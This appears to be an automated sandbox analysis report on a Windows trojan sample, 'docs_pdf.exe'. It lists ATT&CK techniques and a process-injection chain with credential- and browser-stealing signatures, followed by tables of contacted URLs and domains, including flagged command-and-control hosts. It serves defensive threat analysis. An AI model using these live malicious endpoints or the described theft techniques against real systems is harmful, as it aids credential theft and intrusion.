Discovery: 2 System Time Discovery, 1 Account Discovery, 2 File and Directory Discovery, 116 System Information Discovery, 151 Security Software Discovery, 2 Virtualization/Sandbox Evasion, 3 Process Discovery, 11 Application Window Discovery, 1 System Owner/User Discovery
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Cloud Services, Direct Cloud VM Connections
Collection: 1 Archive Collected Data, 1 Data from Local System, 1 Email Collection, 21 Input Capture, 3 Clipboard Data, GUI Input Capture, Web Portal Capture, Credential API Hooking, Data Staged
Command and Control: 4 Ingress Tool Transfer, 1 Encrypted Channel, 4 Non-Application Layer Protocol, 4 Application Layer Protocol, Fallback Channels, Multiband Communication, Commonly Used Port, Application Layer Protocol, Web Protocols
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol, Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: 1 System Shutdown/Reboot, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery, Defacement, Internal Defacement
Behavior Graph (ID 1472520, sample docs_pdf.exe, start date 13/07/2024, architecture WINDOWS, score 100)

Sample-level network: www.xn--matfrmn-jxa4m.se; www.xn--fhq1c541j0zr.com; 7 other IPs or domains
Sample-level signatures: Snort IDS alert for network traffic; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 6 other signatures

Process chain:
docs_pdf.exe 4 (started)
  signatures: Binary is likely a compiled AutoIt script file; Writes to foreign memory regions; Maps a DLL or memory area into another process; Switches to a custom stack to bypass stack traces
  -> svchost.exe (started)
     signatures: Maps a DLL or memory area into another process
     -> qsWkdNJOHuxNQUCXoUm.exe (injected)
        signatures: Found direct / indirect Syscall (likely to bypass EDR)
        -> clip.exe 13 (started)
           signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
           -> qsWkdNJOHuxNQUCXoUm.exe (injected)
              signatures: Found direct / indirect Syscall (likely to bypass EDR)
              network: www.catherineviskadi.com 217.160.0.106, ports 49737, 49738, 49739 (ONEANDONE-ASBrauerstrasse48DE, Germany); www.xn--matfrmn-jxa4m.se 194.9.94.85, ports 49750, 49751, 49752 (LOOPIASE, Sweden); 3 other IPs or domains
           -> firefox.exe (started)

Source | Detection | Scanner | Label | Link
docs_pdf.exe | 45% | ReversingLabs | Win32.Trojan.Generic |
docs_pdf.exe | 100% | Joe Sandbox ML | |
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
Source | Detection | Scanner | Label | Link
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe |
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe |
https://duckduckgo.com/ac/?q= | 0% | Avira URL Cloud | safe |
http://i2.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg | 0% | Avira URL Cloud | safe |
http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2 | 0% | Avira URL Cloud | safe |
https://cdn.consentmanager.net | 0% | Avira URL Cloud | safe |
http://www.bfiworkerscomp.com/Free_Downloads.cfm?fp=4x%2Bj9sdm3eC7HUqiUq%2FlUrOWlceBTk4Vo1G%2F%2BtVz | 0% | Avira URL Cloud | safe |
http://www.bfiworkerscomp.com/xzzi/ | 0% | Avira URL Cloud | safe |
https://duckduckgo.com/chrome_newtab | 0% | Avira URL Cloud | safe |
http://www.xn--fhq1c541j0zr.com/rm91/ | 0% | Avira URL Cloud | safe |
https://static.loopia.se/responsive/images/iOS-72.png | 0% | Avira URL Cloud | safe |
http://www.xn--matfrmn-jxa4m.se | 100% | Avira URL Cloud | malware |
https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe |
https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe |
http://i2.cdn-image.com/__media__/pics/28903/search.png) | 0% | Avira URL Cloud | safe |
https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe | 0% | Avira URL Cloud | safe |
http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf | 0% | Avira URL Cloud | safe |
http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2 | 0% | Avira URL Cloud | safe |
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe |
https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw | 0% | Avira URL Cloud | safe |
https://static.loopia.se/shared/logo/logo-loopia-white.svg | 0% | Avira URL Cloud | safe |
https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park | 0% | Avira URL Cloud | safe |
https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking | 0% | Avira URL Cloud | safe |
http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot | 0% | Avira URL Cloud | safe |
http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf | 0% | Avira URL Cloud | safe |
http://www.bfiworkerscomp.com/__media__/design/underconstructionnotice.php?d=bfiworkerscomp.com | 0% | Avira URL Cloud | safe |
http://www.bfiworkerscomp.com/xzzi/?Y2AhR=fDNdZPHH1hsp8rrp&tDA=9CTSfwlM5YWl8fvbrbSkFth60mtnncbW1FpC9VokAvwkUHOJycf2DDxLp9tWLELwEKEPfCC2oiLqmqE9jQi/S4FmCg8fmWLidol7jMU2H7Flt+5ZogJ/ZG4= | 0% | Avira URL Cloud | safe |
https://www.hprlz.cz/w6qg/?Y2AhR=fDNdZPHH1hsp8rrp&amp;tDA=0lpTRQcDUH | 0% | Avira URL Cloud | safe |
https://static.loopia.se/shared/images/additional-pages-hero-shape.webp | 0% | Avira URL Cloud | safe |
https://delivery.consentmanager.net | 0% | Avira URL Cloud | safe |
http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix | 0% | Avira URL Cloud | safe |
http://www.xn--matfrmn-jxa4m.se/4hda/ | 100% | Avira URL Cloud | malware |
http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot | 0% | Avira URL Cloud | safe |
https://static.loopia.se/shared/style/2022-extra-pages.css | 0% | Avira URL Cloud | safe |
https://static.loopia.se/responsive/images/iOS-114.png | 0% | Avira URL Cloud | safe |
http://i2.cdn-image.com/__media__/pics/28905/arrrow.png) | 0% | Avira URL Cloud | safe |
http://www.xn--matfrmn-jxa4m.se/4hda/?tDA=+FYRabRorC7iiipdZ2F3S2JpD5gx1+4XHVGGEQvE/CSzp7OmTlR57ws6ggMdmmjgEK74RwiZfuW5KkdpyqG9+fjZ9jEj5Dze7n0KBNuQ8eKVrjet+eDbX/8=&Y2AhR=fDNdZPHH1hsp8rrp | 100% | Avira URL Cloud | malware |
http://www.xn--fhq1c541j0zr.com/rm91/?Y2AhR=fDNdZPHH1hsp8rrp&tDA=jSd7r+67+N1qAQkwJvt+iUxfFwvrPy4ZQchR8WhIexhCyQiFJMwmzlR6zVHzfOVMvsfcwBywDpFhuhrgfB+WG8UhwnSvsDBe28fizd0dRyqF3cPtSZfQjsU= | 0% | Avira URL Cloud | safe |
https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park | 0% | Avira URL Cloud | safe |
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | Avira URL Cloud | safe |
http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut | 0% | Avira URL Cloud | safe |
http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular | 0% | Avira URL Cloud | safe |
https://static.loopia.se/responsive/styles/reset.css | 0% | Avira URL Cloud | safe |
http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff | 0% | Avira URL Cloud | safe |
http://www.Bfiworkerscomp.com | 0% | Avira URL Cloud | safe |
http://www.bfiworkerscomp.com/Venture_Capital_Firms.cfm?fp=4x%2Bj9sdm3eC7HUqiUq%2FlUrOWlceBTk4Vo1G%2 | 0% | Avira URL Cloud | safe |
https://www.hprlz.cz/w6qg/?Y2AhR=fDNdZPHH1hsp8rrp&tDA=0lpTRQcDUH | 0% | Avira URL Cloud | safe |
http://i2.cdn-image.com/__media__/pics/29590/bg1.png) | 0% | Avira URL Cloud | safe |
http://www.hprlz.cz/w6qg/?Y2AhR=fDNdZPHH1hsp8rrp&tDA=0lpTRQcDUH+iEsGyb7K93jJ3AkchBc2e7Z/xuNmTgdli9rpOUGyXizj5cQ9XxC4so84FNpFR9txXxm0tq1CayhJ+NIkCDL9/8P53q6zBNKDHtjSuHiPb7bo= | 0% | Avira URL Cloud | safe |
https://static.loopia.se/responsive/images/iOS-57.png | 0% | Avira URL Cloud | safe |
http://i2.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg | 0% | Avira URL Cloud | safe |
http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf | 0% | Avira URL Cloud | safe |
http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf | 0% | Avira URL Cloud | safe |
http://www.bfiworkerscomp.com/Dream_Job_Search.cfm?fp=4x%2Bj9sdm3eC7HUqiUq%2FlUrOWlceBTk4Vo1G%2F%2Bt | 0% | Avira URL Cloud | safe |
http://www.catherineviskadi.com/qe66/ | 0% | Avira URL Cloud | safe |
https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa | 0% | Avira URL Cloud | safe |
http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold | 0% | Avira URL Cloud | safe |
http://i2.cdn-image.com/__media__/js/min.js?v2.3 | 0% | Avira URL Cloud | safe |
http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff | 0% | Avira URL Cloud | safe |
https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin | 0% | Avira URL Cloud | safe |
https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa | 0% | Avira URL Cloud | safe |
http://www.bfiworkerscomp.com/Discussion_Forums.cfm?fp=4x%2Bj9sdm3eC7HUqiUq%2FlUrOWlceBTk4Vo1G%2F%2B | 0% | Avira URL Cloud | safe |
http://www.bfiworkerscomp.com/Alternative_Financing.cfm?fp=4x%2Bj9sdm3eC7HUqiUq%2FlUrOWlceBTk4Vo1G%2 | 0% | Avira URL Cloud | safe |
https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa | 0% | Avira URL Cloud | safe |
https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb | 0% | Avira URL Cloud | safe |
http://www.catherineviskadi.com/qe66/?tDA=dnvLceXALBk3Hr4+RUpDuj1gE1lZ37++NG0MGchlNc+FfqCdFLzpUNQMmrv30qtrBi93uCjMcFA24SebHgOv/zqChZDwQ/s0nTN9cl2J79+sQIZRijKLgDM=&Y2AhR=fDNdZPHH1hsp8rrp | 0% | Avira URL Cloud | safe |
http://www.bfiworkerscomp.com/__media__/js/trademark.php?d=bfiworkerscomp.com&type=ns | 0% | Avira URL Cloud | safe |
http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.xn--matfrmn-jxa4m.se | 194.9.94.85 | true | true | | unknown
www.catherineviskadi.com | 217.160.0.106 | true | true | | unknown
www.anuts.top | 23.251.54.212 | true | true | | unknown
www.bfiworkerscomp.com | 208.91.197.27 | true | true | | unknown
www.hprlz.cz | 5.44.111.162 | true | false | | unknown
www.xn--fhq1c541j0zr.com | 43.252.167.188 | true | true | | unknown
www.fourgrouw.cfd | unknown | unknown | true | | unknown
www.hatercoin.online | unknown | unknown | true | | unknown
www.tinmapco.com | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.xn--fhq1c541j0zr.com/rm91/ | true | Avira URL Cloud: safe | unknown
http://www.bfiworkerscomp.com/xzzi/ | true | Avira URL Cloud: safe | unknown
http://www.bfiworkerscomp.com/xzzi/?Y2AhR=fDNdZPHH1hsp8rrp&tDA=9CTSfwlM5YWl8fvbrbSkFth60mtnncbW1FpC9VokAvwkUHOJycf2DDxLp9tWLELwEKEPfCC2oiLqmqE9jQi/S4FmCg8fmWLidol7jMU2H7Flt+5ZogJ/ZG4= | true | Avira URL Cloud: safe | unknown
http://www.xn--matfrmn-jxa4m.se/4hda/ | true | Avira URL Cloud: malware | unknown
http://www.xn--matfrmn-jxa4m.se/4hda/?tDA=+FYRabRorC7iiipdZ2F3S2JpD5gx1+4XHVGGEQvE/CSzp7OmTlR57ws6ggMdmmjgEK74RwiZfuW5KkdpyqG9+fjZ9jEj5Dze7n0KBNuQ8eKVrjet+eDbX/8=&Y2AhR=fDNdZPHH1hsp8rrp | true | Avira URL Cloud: malware | unknown
http://www.xn--fhq1c541j0zr.com/rm91/?Y2AhR=fDNdZPHH1hsp8rrp&tDA=jSd7r+67+N1qAQkwJvt+iUxfFwvrPy4ZQchR8WhIexhCyQiFJMwmzlR6zVHzfOVMvsfcwBywDpFhuhrgfB+WG8UhwnSvsDBe28fizd0dRyqF3cPtSZfQjsU= | true | Avira URL Cloud: safe | unknown
http://www.hprlz.cz/w6qg/?Y2AhR=fDNdZPHH1hsp8rrp&tDA=0lpTRQcDUH+iEsGyb7K93jJ3AkchBc2e7Z/xuNmTgdli9rpOUGyXizj5cQ9XxC4so84FNpFR9txXxm0tq1CayhJ+NIkCDL9/8P53q6zBNKDHtjSuHiPb7bo= | false | Avira URL Cloud: safe | unknown
http://www.catherineviskadi.com/qe66/ | true | Avira URL Cloud: safe | unknown
http://www.catherineviskadi.com/qe66/?tDA=dnvLceXALBk3Hr4+RUpDuj1gE1lZ37++NG0MGchlNc+FfqCdFLzpUNQMmrv30qtrBi93uCjMcFA24SebHgOv/zqChZDwQ/s0nTN9cl2J79+sQIZRijKLgDM=&Y2AhR=fDNdZPHH1hsp8rrp | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | clip.exe, 00000003.00000002.2917722091.0000000007C0E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/ac/?q= | clip.exe, 00000003.00000002.2917722091.0000000007C0E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.xn--matfrmn-jxa4m.se | qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2916711467.0000000004F10000.00000040.80000000.00040000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://cdn.consentmanager.net | clip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2 | clip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://i2.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg | clip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.bfiworkerscomp.com/Free_Downloads.cfm?fp=4x%2Bj9sdm3eC7HUqiUq%2FlUrOWlceBTk4Vo1G%2F%2BtVz | clip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | clip.exe, 00000003.00000002.2917722091.0000000007C0E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://static.loopia.se/responsive/images/iOS-72.png | clip.exe, 00000003.00000002.2916160322.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.0000000003952000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://i2.cdn-image.com/__media__/pics/28903/search.png) | clip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2 | clip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking | clip.exe, 00000003.00000002.2916160322.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.0000000003952000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf | clip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://static.loopia.se/shared/logo/logo-loopia-white.svg | clip.exe, 00000003.00000002.2916160322.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.0000000003952000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe | clip.exe, 00000003.00000002.2916160322.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.0000000003952000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw | clip.exe, 00000003.00000002.2916160322.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.0000000003952000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf | clip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | clip.exe, 00000003.00000002.2917722091.0000000007C0E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park | clip.exe, 00000003.00000002.2916160322.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.0000000003952000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot | clip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix | clip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.hprlz.cz/w6qg/?Y2AhR=fDNdZPHH1hsp8rrp&amp;tDA=0lpTRQcDUH | clip.exe, 00000003.00000002.2916160322.0000000005264000.00000004.10000000.00040000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.0000000002E54000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2121303941.0000000005D34000.00000004.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.bfiworkerscomp.com/__media__/design/underconstructionnotice.php?d=bfiworkerscomp.com | clip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://static.loopia.se/shared/images/additional-pages-hero-shape.webp | clip.exe, 00000003.00000002.2916160322.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.0000000003952000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://delivery.consentmanager.net | clip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://static.loopia.se/shared/style/2022-extra-pages.css | clip.exe, 00000003.00000002.2916160322.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.0000000003952000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://static.loopia.se/responsive/images/iOS-114.png | clip.exe, 00000003.00000002.2916160322.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.0000000003952000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot | clip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://i2.cdn-image.com/__media__/pics/28905/arrrow.png) | clip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park | clip.exe, 00000003.00000002.2916160322.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.0000000003952000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | clip.exe, 00000003.00000002.2917722091.0000000007C0E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut | clip.exe, 00000003.00000002.2916160322.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.0000000003952000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.ecosia.org/newtab/ | clip.exe, 00000003.00000002.2917722091.0000000007C0E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular | clip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://static.loopia.se/responsive/styles/reset.css | clip.exe, 00000003.00000002.2916160322.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.0000000003952000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff | clip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.Bfiworkerscomp.com | clip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.bfiworkerscomp.com/Venture_Capital_Firms.cfm?fp=4x%2Bj9sdm3eC7HUqiUq%2FlUrOWlceBTk4Vo1G%2 | clip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
